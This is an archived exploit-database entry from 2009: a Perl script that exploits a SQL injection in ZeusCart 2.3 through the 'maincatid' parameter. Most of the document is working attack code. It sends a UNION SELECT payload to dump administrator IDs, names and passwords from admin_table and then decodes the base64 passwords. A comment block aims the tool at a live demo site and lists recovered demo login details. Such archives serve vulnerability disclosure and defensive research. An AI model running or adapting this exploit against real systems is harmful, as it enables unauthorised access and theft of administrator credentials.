ZeusCart 2.3 - 'maincatid' SQL Injection

EDB-ID:

8829

Author:

Br0ly

Type:

webapps

Platform:

PHP

Published:

2009-05-29

#!usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: Zeus Cart V 2.3
#| -Site: http://www.zeuscart.com/
#| -Site Demo: http://www.zeuscart.com/onlinedemo.php?action=skip
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly[dot]Code[at]gmail[dot]com
#|
#| -Gretz: Osirys , xs86 , str0ke
#|
#| -p0c:
#| -SQL INJECTION:
#| 
#| -9999+union+all+select+0--
#|
#| - Demo ONline:
#|
#| -> http://ajdemos.com/demo/zeuscart/v23/?do=featured&action=showmaincatlanding&maincatid=[SQL]
#|   
#|
#| -Exploit: Demo:
#|
#|perl zeuscart.txt http://ajdemos.com/demo/zeuscart/v23/
#|
#|  --------------------------------------
#|   -Zeus Cart V2.3                  
#|   -Sql Injection                      
#|   -by Br0ly                           
#|  --------------------------------------
#|
#|[+] Getting the login,pass
#|
#|[+] User   = demoadmin
#|[+] Pass   = demo123
#|
#|
#| ;D
#|

  use IO::Socket::INET;
  use LWP::UserAgent;
  use MIME::Base64;
 
   my $host    = $ARGV[0];
   my $sql_path = "/?do=featured&action=showmaincatlanding&maincatid=";
   
 
  if (@ARGV < 1) {
      &banner();
      &help("-1");
  }

  elsif(cheek($host) == 1) {
      &banner();
      &xploit($host,$sql_path);
  }
 
  else {
      &banner();
      help("-2");
  }
 
  sub xploit() {

      my $host     = $_[0];
      my $sql_path = $_[1];

      print "[+] Getting the login,pass\n\n";

      my $sql_atk = $host.$sql_path."-9999+union+all+select+concat(0x6272306c79,0x3a,admin_id,0x3a,admin_name,0x3a,admin_password,0x3a,0x6272306c79)+from+admin_table--";
      my $sql_get = get_url($sql_atk);
      my $connect = tag($sql_get);
     
      if($connect =~ /br0ly:(.+):(.+):(.+):br0ly/) {
   
    my $id   = $1;
    my $user = $2;
    my $pass = $3;

      if($id =~ /(.+):/) {
     
      my $id_2 = $1;
      }
     
    my $pass_aux =  base64_decode($pass);

    print "[+] User   = $user\n";
    print "[+] Pass   = $pass_aux\n";
   
    exit(0);
      }
      else {
    print "[-] Exploit, Fail\n";
    exit(0);
     
      }
 }

   sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
  }

  sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
  }

  sub cheek() {
    my $host  = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
  }

  sub base64_decode () {
   
    my $str_1 = $_[0];
    my $str_decode = decode_base64($str_1);
    return $str_decode;
  }


  sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }
   
    elsif ($error == -2) {

        print "\n[-] Error, Bad arguments !\n";
    }
 
    print "[*] Usage : perl $0 http://localhost/zeuscart/\n\n";
    print "    Ex:     perl $0 http://localhost/zeuscart/\n\n";
    exit(0);
  }

  sub banner {
    print "\n".
          "  --------------------------------------\n".
          "   -Zeus Cart V2.3                   \n".
          "   -Sql Injection                       \n".
          "   -by Br0ly                            \n".
          "  --------------------------------------\n\n";
  }

# milw0rm.com [2009-05-29]